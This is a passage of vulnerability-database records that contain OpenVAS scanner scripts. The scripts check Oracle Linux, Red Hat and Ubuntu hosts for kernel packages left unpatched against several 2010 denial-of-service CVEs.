re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~71.18.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:1361412562310870664", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870664", "type": "openvas", "title": "RedHat Update for kernel RHSA-2011:0283-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2011:0283-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-February/msg00026.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870664\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:44:39 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2011:0283-01\");\n script_name(\"RedHat Update for kernel RHSA-2011:0283-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n\n * A divide-by-zero flaw was found in the tcp_select_initial_window()\n function in the Linux kernel's TCP/IP protocol suite implementation. A\n local, unprivileged user could use this flaw to trigger a denial of service\n by calling setsockopt() with certain options. (CVE-2010-4165, Moderate)\n\n * A use-after-free flaw in the mprotect() system call in the Linux kernel\n could allow a local, unprivileged user to cause a local denial of service.\n (CVE-2010-4169, Moderate)\n\n * A flaw was found in the Linux kernel execve() system call implementation.\n A local, unprivileged user could cause large amounts of memory to be\n allocated but not visible to the OOM (Out of Memory) killer, triggering a\n denial of service. (CVE-2010-4243, Moderate)\n\n Red Hat would like to thank Steve Chen for reporting CVE-2010-4165, and\n Brad Spengler for reporting CVE-2010-4243.\n\n This update also fixes several bugs and adds two enhancements.\n Documentation for these bug fixes and enhancements will be available\n shortly from the Technical Notes document linked to in the References\n section.\n\n Users should upgrade to these updated packages, which contain backported\n patches to correct these issues, and fix the bugs and add the enhancements\n noted in the Technical Notes. The system must be rebooted for this update\n to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~71.18.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4249"], "description": "Oracle Linux Local Security Checks ELSA-2011-2010", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122217", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-2010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-2010.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122217\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:14:56 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-2010\");\n script_tag(name:\"insight\", value:\"ELSA-2011-2010 - Oracle Linux 6 Unbreakable Enterprise kernel security fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-2010\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-2010.html\");\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\", \"CVE-2010-4668\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~100.28.9.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~100.28.9.el5~1.5.1~4.0.28\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~100.28.9.el5debug~1.5.1~4.0.28\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~100.28.9.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-04T11:27:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-0435", "CVE-2010-4169", "CVE-2010-4249"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1054-1", "modified": "2017-12-01T00:00:00", "published": "2011-02-04T00:00:00", "id": "OPENVAS:840579", "href": "http://plugins.openvas.org/nasl.php?oid=840579", "type": "openvas", "title": "Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1054_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Gleb Napatov discovered that KVM did not correctly check certain\n privileged operations. A local attacker with access to a guest kernel\n could exploit this to crash the host system, leading to a denial of\n service. (CVE-2010-0435)\n\n Steve Chen discovered that setsockopt did not correctly check MSS values.\n A local attacker could make a specially crafted socket call to crash\n the system, leading to a denial of service. (CVE-2010-4165)\n \n Dave Jones discovered that the mprotect system call did not correctly\n handle merged VMAs. A local attacker could exploit this to crash the\n system, leading to a denial of service. (CVE-2010-4169)\n \n Vegard Nossum discovered that memory garbage collection was not\n handled correctly for active sockets. A local attacker could exploit\n this to allocate all available kernel memory, leading to a denial of\n service. (CVE-2010-4249)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1054-1\";\ntag_affected = \"linux, linux-ec2 vulnerabilities on Ubuntu 10.04 LTS ,\n Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1054-1/\");\n script_id(840579);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-04 14:19:53 +0100 (Fri, 04 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1054-1\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-virtual\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-virtual\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1025.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-25\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n 